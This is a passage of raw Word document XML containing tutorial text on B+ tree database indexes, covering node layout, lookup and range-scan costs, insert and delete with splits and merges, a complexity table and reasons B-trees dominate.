    <w:p w14:paraId="50F21D96" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791"/>
    <w:p w14:paraId="7365EA37" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>ptr₀ → subtree with all keys &lt; key₁</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27D7414F" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>ptr₁ → subtree with keys ≥ key₁ and &lt; key₂</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07F13AF6" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>ptr₂ → subtree with keys ≥ key₂ and &lt; key₃</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C6F98E1" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7048BB57" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>Example (page size 8 KB, key = 8 bytes, pointer = 6 bytes):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3147DD03" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CF67EDA" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>Keys per internal node: (8192 - header) / (8 + 6) ≈ 500+</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="076D44F8" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>Fanout: ~500 children per node</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05FB946C" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Leaf node:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F799ACD" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17345A5B" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>┌─────────────────────────────────────────────────────────────────┐</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E7B0B28" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>│ [key₁, row_ptr₁] [key₂, row_ptr₂] ... [key</w:t>
      </w:r>
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math" w:cs="Cambria Math"/>
        </w:rPr>
        <w:t>ₘ</w:t>
      </w:r>
      <w:r w:rsidRPr="00A12791">
        <w:t>, row_ptr</w:t>
      </w:r>
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math" w:cs="Cambria Math"/>
        </w:rPr>
        <w:t>ₘ</w:t>
      </w:r>
      <w:r w:rsidRPr="00A12791">
        <w:t>] [</w:t>
      </w:r>
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
        </w:rPr>
        <w:t>→</w:t>
      </w:r>
      <w:r w:rsidRPr="00A12791">
        <w:t>next]</w:t>
      </w:r>
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
        </w:rPr>
        <w:t>│</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6167DCEA" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>└─────────────────────────────────────────────────────────────────┘</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6892DF9C" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791"/>
    <w:p w14:paraId="6599655F" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>key: the indexed column value</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48D2D776" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>row_ptr: pointer to the actual row in the heap (page_id + offset)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BA09D90" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>→next: pointer to next leaf node (for range scans)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BC97308" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>3.4 B+ Tree Operations — How They Work</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A4ECBF4" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Lookup (point query):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BF32581" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39F2CC36" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>Search for key = 42 in a tree with 100 million rows:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32910152" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791"/>
    <w:p w14:paraId="7FEC681F" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>Level 0 (root): Binary search within root node → follow pointer to child</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B637C74" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>Level 1: Binary search within internal node → follow pointer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22AA261D" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>Level 2: Binary search within internal node → follow pointer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7484F44F" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>Level 3 (leaf): Binary search within leaf → found key 42 → row pointer → fetch row</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B9D695F" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791"/>
    <w:p w14:paraId="50E01FED" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>Total I/O: 3–4 page reads (root is usually cached in memory → effectively 2–3 reads)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4135ACB3" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>Time: 2–3 × 0.1ms (SSD random read) = 0.2–0.3ms</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="432F348E" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Height calculation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05000A26" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D92101F" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>Table rows: N</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17815792" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>Keys per leaf: ~200 (8 KB page, 40 bytes per entry)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58093B81" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>Fanout of internal nodes: ~500</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="753C97EE" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791"/>
    <w:p w14:paraId="309D7E06" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>Leaves needed: N / 200</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24F869B3" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>Height: log</w:t>
      </w:r>
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math" w:cs="Cambria Math"/>
        </w:rPr>
        <w:t>ₓ</w:t>
      </w:r>
      <w:r w:rsidRPr="00A12791">
        <w:t>(leaves) where x = fanout</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68FBB05F" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791"/>
    <w:p w14:paraId="1AAA1D22" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>N = 1 million:   height ≈ 3 (root + 1 internal + leaf)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B2C550E" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>N = 100 million:  height ≈ 4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EC7BA4D" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>N = 10 billion:   height ≈ 5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F42E901" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>Even for 10 billion rows, only 5 page reads are needed. With root and upper levels cached: 2–3 actual disk reads.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14F1745A" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Range scan:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E0961E3" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18FCF5FE" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>Query: SELECT * FROM orders WHERE amount BETWEEN 100 AND 500</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B75D16A" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791"/>
    <w:p w14:paraId="31EF9591" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>1. Traverse tree to find first leaf with key ≥ 100.   (3 I/Os)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F49AF25" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>2. Follow leaf-to-leaf pointers, reading matching entries. (sequential I/O)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58D1059E" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>3. Stop when key &gt; 500.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65D15CCE" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791"/>
    <w:p w14:paraId="2BE245F2" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>I/O: 3 random reads + N sequential leaf reads</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22A2191A" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>This is efficient because leaves are sorted AND linked.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FA9B929" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Insert:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D313501" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13CB62C6" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>1. Traverse tree to find correct leaf.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C98FFB2" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>2. Insert key in sorted position within leaf.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14965198" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>3. If leaf is full → SPLIT:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65C4E67E" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">   a. Create new leaf. Move half the keys to new leaf.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DCB6B68" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">   b. Add pointer to new leaf in parent internal node.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FE44362" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">   c. If parent is full → split parent (recursively up to root).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42F9CED5" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">   d. If root splits → tree grows one level taller.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04809F1E" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Delete:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5564FE4A" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E7C4629" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>1. Find the key in the leaf.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="209C4E3D" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>2. Remove it.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27724E9B" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>3. If leaf becomes less than half full → MERGE with sibling or REBALANCE.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="673E5EFB" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>4. Propagate changes up if needed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ECEB8BF" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:lastRenderedPageBreak/>
        <w:t>(In practice, many databases "mark deleted" and reclaim space lazily — PostgreSQL VACUUM)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B925100" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.5 B-Tree Performance Characteristics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76"/>
        <w:gridCol w:w="1640"/>
        <w:gridCol w:w="2966"/>
      </w:tblGrid>
      <w:tr w:rsidR="00A12791" w:rsidRPr="00A12791" w14:paraId="41DA2EA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3A5021" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00A12791">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Operation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20E7BE" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00A12791">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Complexity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673146" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00A12791">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Typical I/O</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A12791" w:rsidRPr="00A12791" w14:paraId="6B113EB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3DCAE9" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
            <w:r w:rsidRPr="00A12791">
              <w:t>Point lookup (by indexed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9E3697" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
            <w:r w:rsidRPr="00A12791">
              <w:t>O(log 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A138EA" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
            <w:r w:rsidRPr="00A12791">
              <w:t>2–4 page reads</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A12791" w:rsidRPr="00A12791" w14:paraId="1CA9557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A0379F" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
            <w:r w:rsidRPr="00A12791">
              <w:t>Range scan (K matching rows)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827E58" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
            <w:r w:rsidRPr="00A12791">
              <w:t>O(log n + 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35B68E" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
            <w:r w:rsidRPr="00A12791">
              <w:t>2–4 + K/entries_per_page</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A12791" w:rsidRPr="00A12791" w14:paraId="1B29986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402453" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
            <w:r w:rsidRPr="00A12791">
              <w:t>Insert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BE4E2E" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
            <w:r w:rsidRPr="00A12791">
              <w:t>O(log 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CA263C" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
            <w:r w:rsidRPr="00A12791">
              <w:t>2–4 reads + 1–2 writes</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A12791" w:rsidRPr="00A12791" w14:paraId="47A4358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C766C7" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
            <w:r w:rsidRPr="00A12791">
              <w:t>Delete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BEBA34" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
            <w:r w:rsidRPr="00A12791">
              <w:t>O(log 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FA5BE5" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
            <w:r w:rsidRPr="00A12791">
              <w:t>2–4 reads + 1–2 writes</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A12791" w:rsidRPr="00A12791" w14:paraId="280E78A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A69E57" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
            <w:r w:rsidRPr="00A12791">
              <w:t>Update (indexed column)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1533B6" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
            <w:r w:rsidRPr="00A12791">
              <w:t>O(log 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6DD197" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
            <w:r w:rsidRPr="00A12791">
              <w:t>Delete old + insert new</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="4E368C2F" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.6 Why B-Trees Dominate</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DACBCCB" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1454"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Balanced:</w:t>
      </w:r>
      <w:r w:rsidRPr="00A12791">
        <w:t> Worst case = average case (uniform O(log n)).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06D389CC" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1454"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Disk-friendly:</w:t>
      </w:r>
      <w:r w:rsidRPr="00A12791">
        <w:t> Nodes match page sizes. Minimizes I/O.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C5A069C" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1454"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Good for both point lookups AND range queries.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24BC9505" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1454"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Predictable performance:</w:t>
      </w:r>
      <w:r w:rsidRPr="00A12791">
        <w:t> Height is bounded.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71ADAE84" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
